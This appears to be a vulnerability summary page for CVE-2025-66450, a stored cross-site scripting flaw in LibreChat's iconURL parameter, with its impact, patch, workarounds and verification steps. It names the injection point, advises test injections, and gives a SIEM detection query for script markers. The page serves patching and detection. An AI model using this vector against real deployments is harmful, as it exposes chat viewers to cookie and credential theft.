CVE-2025-66450
📋 TL;DR
CVE-2025-66450 is a stored cross-site scripting (XSS) vulnerability in LibreChat where attackers can inject malicious code via the iconURL parameter. This code executes when users view shared chat links, potentially compromising their privacy. Users of LibreChat versions 0.8.0 and below are affected.
💻 Affected Systems
- LibreChat
📦 What is this software?
Librechat by Librechat
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, credentials, or other sensitive data from users viewing malicious chat links, potentially leading to account takeover or data exfiltration.
Likely Case
Privacy violation through tracking of users who view shared chat links, potentially exposing IP addresses, browser fingerprints, or other identifiable information.
If Mitigated
With proper input validation and output encoding, the malicious payload would be neutralized before execution.
🎯 Exploit Status
Exploitation requires ability to create or modify chat messages, but the actual XSS payload execution is straightforward.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 0.8.1
Vendor Advisory: https://github.com/danny-avila/LibreChat/security/advisories/GHSA-84vx-vmcf-xgpp
Restart Required: Yes
Instructions:
1. Backup your current installation. 2. Update to LibreChat version 0.8.1 or later. 3. Restart the LibreChat service. 4. Verify the fix is applied.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side validation to sanitize iconURL parameter inputs
Implement input validation in your application code to reject or sanitize malicious iconURL values
Content Security Policy
allImplement strict CSP headers to prevent execution of injected scripts
Add Content-Security-Policy header to restrict script sources
🧯 If You Can't Patch
- Disable chat sharing functionality entirely
- Implement web application firewall (WAF) rules to block malicious iconURL patterns
🔍 How to Verify
Check if Vulnerable:
Check if LibreChat version is 0.8.0 or earlier. Test by attempting to inject script payloads in iconURL parameter.Check Version:
Check package.json or run: npm list @librechat/coreVerify Fix Applied:
After updating to 0.8.1+, attempt to inject malicious payloads in iconURL parameter and verify they are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual iconURL parameter values containing script tags or JavaScript code
- Multiple failed validation attempts on iconURL parameter
Network Indicators:
- HTTP POST requests with suspicious iconURL parameter values
- External resource loading from unexpected domains in chat views
SIEM Query:
source="librechat" AND (iconURL CONTAINS "<script>" OR iconURL CONTAINS "javascript:")